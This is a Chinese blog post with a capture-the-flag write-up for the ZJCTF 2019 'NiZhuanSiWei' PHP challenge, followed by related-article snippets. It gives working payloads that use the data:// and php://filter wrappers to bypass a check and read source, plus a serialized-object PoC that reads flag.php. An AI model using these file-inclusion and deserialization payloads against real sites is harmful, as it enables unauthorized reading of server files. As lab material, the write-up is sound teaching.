NSSCTF[ZJCTF 2019]NiZhuanSiWei详解(超级无敌详细,伪协议,文件包含,反序列化)

于 2024-01-29 21:34:49 发布
阅读量738 收藏 13
点赞数 9
分类专栏: CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66112047/article/details/135921449
版权

这到题目包含了很多东西,文件包含,伪协议还有反序列化都有,但是不难。

先看源码吧

分析一下:

有三个传入的变量名,猜测最后进入else可以出flag;

首先我们输入的t要满足t=welcome to the zjctf

file不能含有flag但是下面有注释的文件名,可能是提醒我,尝试去读取那个文件构造,首先我们要进入到那么的环境里面去尝试进去 首先file_get_contents是得读取到"文件"里的内容,而$text是一个变量,file_get_contents不能读取一个变量

那我们尝试使用data伪协议去给他赋值,在一个文件里面。payload:/?text=data://text/plain,welcome to the zjctf

成功进入

这时候我们尝试读取useless.php文件内容

使用filter伪协议构造payload:&file=php://filter/read=convert.base64-encode/resource=useless.php

使用工具解码:解码后的代码

useless.php里写的file_get_contents直接去读flag.php,构造反序列化,poc:

<?php
class Flag
{  //flag.php
    public $file = 'flag.php';
}
$a = new Flag();
echo urlencode(serialize($a));

提交序列化内容,要注意这时候我们不需要去访问useless.php文件的内容了,我们构造的反序列化会把之前的覆盖掉,最终我们要的是useless.php来访问我们的flag

序列化代码:

<?php
class Flag
{  //flag.php
    public $file = 'flag.php';
}
$a = new Flag();
echo urlencode(serialize($a));

payload:?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O%3A4%3A"Flag"%3A1%3A{s%3A4%3A"file"%3Bs%3A8%3A"flag.php"%3B}

查看源码拿下flag;

Archie_x
关注
专栏目录
Python实现JSON序列化与反序列化:多种方法与案例详解
qq_42568323的博客
10-12 1733
在编程中,序列化指的是将数据结构(如字典、列表、对象等)转换为一种格式(如JSON、XML等),以便能够存储或传输。反之,反序列化是指将存储或传输的格式化数据重新解析为原始的数据结构。序列化(Serialization):将对象转换为JSON格式。反序列化(Deserialization):将JSON格式的数据解析为Python对象。在Python中,JSON序列化和反序列化主要使用内置的json库。在某些情况下,我们可能需要对JSON数据进行自定义的编码和解码。
深度详解Java序列化
最新发布
weixin_43178406的博客
09-24 6万+
 对象序列化是将对象转换为字节序列的过程,使其可以在网络上进行传输或者保存到磁盘上。本文将详细介绍Java对象序列化的实现机制、工作原理和注意事项。希望能对学习Java的同学们有所帮助。 文章目录 1. Java对象序列化的作用 2. Java对象序列化实现机制 3. 序列化的注意事项 4. 常用的序列化协议 4.1 Java标准序列化 4.2 JSON 4.3 Protobuf 4.4 Thrift 5. 总结
[ZJCTF 2019]NiZhuanSiWei伪协议读取文件)
qq_44111753的博客
02-02 531
0x01 知识点 1、data协议用于数据流的读取 data://text/plain;base64,xxxx(base64编码后的数据) data伪协议只有在php<5.3且allow_url_fopen :on,allow_url_include:on时可以写木马。 2、php伪协议:可结合文件包含漏洞读取文件源码或执行文件 需要开启allow_url_fopen的:php://input、php://stdin、php://memory和php://temp 不需要开启allow_wrl_fo
[ZJCTF 2019]NiZhuanSiWei、[ACTF2020 新生赛]BackupFile、[WUSTCTF2020] 朴实无华
weixin_52268949的博客
04-17 151
我们使用head命令将fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag读出,空格使用$IFS$9来绕过空格。会先将字符串转化为整数然后再进行比较。这个地方考察的md5弱类型比较,通过弱类型比较,与md5加密后的值相等,即可绕过,这里绕过也很简单我们找到以0e开头的字符串,加密后还是以0e开头即可在弱类型比较时均转换成整数0。
[ZJCTF 2019]NiZhuanSiWei
brainw的博客
04-22 2652
[ZJCTF 2019]NiZhuanSiWei 代码审计 查看一下useless.php --只有注释信息 没有用 利用data协议绕过 将welcome to the zjctf写入 而data://协议允许读入 payload: text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 到这里就不会了 只有看下wp了 正则判断...
BUUCTF之[ZJCTF 2019]NiZhuanSiWei -------------- php和data伪协议,和反序列化
weixin_44632787的博客
07-17 593
BUUCTF之[ZJCTF 2019]NiZhuanSiWei 知识点: PHP伪协议 php://filter data:// 题目: <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "&lt
java 序列化与反序列化的实例详解
08-29
java 序列化与反序列化的实例详解 Java 序列化与反序列化是 Java 编程语言中的一种机制,允许将 Java 对象转换为字节序列,并将其反序列化回 Java 对象。序列化是指将 Java 对象转换为字节序列的过程,而反序列化是...
probuf 流无协议文件反序列化
活在世界上的百分之八的博客
04-17 1966
最近解码了一个没有协议(.proto)文件的probuf包,遇到了以下的一些问题: 不清楚probuf的基础知识; 不清楚probuf的序列换和反序列化规则; 没有合适的调试工具; 不熟悉java里probuf流的操作; 解决了以上几个问题,问题也就迎刃而解了! 一、不清楚probuf的基础知识 官方定义: protocol buffers 是一种语言无关、平台无关、可...
【网络安全 | CTF】CTF极客大挑战2019PHP解题详析(Dirsearch+php反序列化
等风来
08-24 5415
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
[ZJCTF 2019]NiZhuanSiWei (__tostring反序列化,data和filter伪协议)
开心星人的博客
08-15 576
接下来想要查看useless.php的内容,直接访问是一块白板,查看源码也什么都没有。(因为php代码并没有写在注释中,所以我们查看源码看不到;并且这串php代码也跟页面渲染无关,所以我们看到的页面是白板)所以我们可以使用php://filter伪协议查看源码。这里我们肯定不存在一个文件,并且该文件的内容为。所以会调用__tostring()函数。所以可以使用data伪协议进行绕过。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值